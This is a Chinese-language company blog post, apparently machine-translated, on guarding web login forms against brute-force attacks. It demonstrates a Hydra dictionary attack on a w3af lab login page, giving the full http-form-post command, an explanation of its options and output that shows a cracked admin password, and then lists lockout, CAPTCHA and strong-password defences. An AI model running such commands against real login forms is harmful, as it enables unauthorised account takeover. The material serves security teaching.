我们软件公司基于Web的登录自动暴力破解的防范

添加时间:2019-06-26 22:08:47

来源:

浏览:

暴力攻击是最经常受到的攻击,因为简单粗暴,今天我们成都软件公司就简单说下怎么预防暴力破解。


暴力攻击的工作原理是计算可能构成密码的每种可能组合并对其进行测试以查看密码是否正确。随着密码长度的增加,平均而言,找到正确密码的时间量呈指数级增长。这意味着通常可以很快发现短密码,但更长的密码可能需要数十年。


在某些情况下,随着计算机硬件变得越来越快,它可能是可行的。一个简单的暴力攻击将从一位数的密码开始,然后是两位数的密码,依此类推,尝试所有可能的组合直到一个工作。


一个更好的想法是“字典攻击”,它尝试字典中的单词 - 或常用密码列表 - 而不是所有可能的密码。这可能非常有效,因为许多人使用这种弱密码和常用密码。


我们可以使用自动化工具进行Brute强制基于Web的登录表单


使用Hydra对字典攻击基于Web的登录表单

Hydra是一种用于字典攻击的在线密码破解。它会尝试使用用户名和密码列表,直到找到成功的登录名。它是多线程的,可以以每分钟数千的速度尝试用户名/密码组合[来源



Hydra可用于攻击许多不同的服务,包括IMAP,SMB,HTTP,VNC,MS-SQL MySQL,SMTP,SSH等等


此工具不得用于攻击您无权执行此操作的网站或服务。仅用于合法测试目的。


一个例子攻击

的网络安全道场有,你可以用它来测试这些技术的各种漏洞的应用程序。因此,在一个示例中,w3af测试框架在以下位置进行了测试登录


http://192.168.1.69/w3af/bruteforce/form_login/


HTML表单的重要部分是:


filter_none

编辑

play_arrow


brightness_4

<form name="input" action="dataReceptor.php" method="post"> 

Username: 

<input type="text" name="user"> 

  

Password: 

<input type="password" name="pass"> 

如果我们输入一个错误的用户名和密码组合,我们得到:


糟糕的登录,停止强制我!用户的糟糕u / p组合:a

所以,现在我们有了攻击这个登录表单所需的信息,我们可以使用这些信息来构建一个Hydra暴力攻击,如下所示:


hydra 192.168.1.69 http-form-post“/w3af/bruteforce/form_login/dataReceptor.php:user=^USER^&pass=^PASS^:Bad login”-L users.txt -P pass.txt -t 10 -w 30 -o hydra-http-post-attack.txt

如果我们打破这个


主机= 192.168.1.69

方法= http-form-post

URL = /w3af/bruteforce/form_login/dataReceptor.php

表格参数= user = ^ USER ^&pass = ^ PASS ^

失败响应=登录失败

用户file = users.txt

密码文件= pass.txt

线程= -t 10

等待超时= -w 30

输出文件= -o hydra-http-post-attack.txt

Hydra基本上遍历所有用户名/密码组合,直到它获得不包含文本“Bad login”的响应。当我们运行此攻击时,我们得到:


Hydra基本上遍历所有用户名/密码组合,直到它获得不包含文本“Bad login”的响应。当我们运行此攻击时,我们得到:




Hydra v6.5(c)2011 by van Hauser / THC和David Maciejak  

[DATA] 5个任务,1个服务器,5次登录尝试(l:5 / p:1),每次任务尝试~1次

[DATA]在端口80上攻击服务http-post-form

[状态]攻击结束为192.168.1.69(等待孩子完成)

[80] [www-form]主持人:192.168.1.69登录:admin密码:1234

Hydra(http://www.thc.org/thc-hydra)于2011-08-22 13:11:07结束


如您所见,这是成功的,并找到用户“admin”密码为“1234”。

预防


首先是实施帐户锁定策略。例如,在三次登录尝试失败后,该帐户将被锁定,直到管理员将其解锁。

我们应该使用质询 - 响应测试来防止自动提交登录页面。诸如免费reCAPTCHA之类的工具可用于要求用户输入单词或解决简单的数学问题以确保用户实际上是一个人。

任何Web应用程序都应强制使用强密码。至少,要求用户选择具有一定复杂性(字母和数字,或需要一个特殊字符)的八个字母或更多字母的密码是防止暴力攻击的极好防御。


需要安全的软件,就找我们开发吧!

用户名 Name
评论 Comment

管理系统  相关内容

——
20

2020-10

Node.js和React.js之间的区…

Node.js: Node.js是一个开放源代码和跨平台的运行时环境,用于在浏览器外部执行JavaScript代码。您需要记住,NodeJS不是框架,也不是编程语言。大多数人感到困惑,并且理解它是框架还是编程语言。我们经常使用Node.js构建后端服务,例如Web App或Mob… [了解更多]

20

2020-10

React Native和Flutter…

在本文中,我们将讨论两个框架,这两个框架在相当长的一段时间内都得到了很好的维护,并超越了这些框架,它们分别是React Native和Flutter。考虑到在移动应用程序开发方面投入的大量技能,时间和金钱,如今的公司需要一种更快的方法来制作应用程序。另外,要编写本机应用程序,您需… [了解更多]

22

2020-09

交通运输业务支撑平台解决方案

交通运输业指国民经济中专门从事运送货物和旅客的社会生产部门,包括铁路、公路、水运、航空等运输部门。它是国民经济的重要组成部分,是保证人们在政治、经济、文化、军事等方面联系交往的手段,也是衔接生产和消费的一个重要环节。在现代社会中,运输发展的水平已经成为了一个国家发达水平和人类文明… [了解更多]

22

2020-09

商贸零售OA协同办公管理系统解决方案

零售企业(百货商店、折扣商店、大型食品店、药店和专业商店等)的管理通常包括商品采购、店铺作业、人事、财务、市场营销这五个方面的组织、计划、指挥和控制活动,有效的企业资源规划则是其中最重要的内容。随着信息产业的飞速发展,信息化管理已经引入并应用到各行业管理领域尤其是对于零售业。企业… [了解更多]

28

2020-06

CRM客户关系管理系统包含功能模块

客户管理主要包括功能客户基础信息,客户分配等,员工可修改客户资料,领导可对客户资料进行追溯沟通记录客户沟通记录,自动记录客户沟通过程中产生的语音和文字,便于查询微信沟通客户在微信中与员工的沟通记录,可自动记录到系统之中,提高员工的自我管理工作进度不同业务有不同流程,将工作进度即时… [了解更多]

联系我们

/ CONTACT US

地 址:成都市人民南路四段成科西路三号

邮政编码:610000

电 话:18215660330

传 真:18215660330

手机:18215660330

邮 箱:zzjfuture@gmail.com

投诉邮 箱:18215660330

姓名Name
标题Title
邮 箱Emali
联系电话Tel
内容Content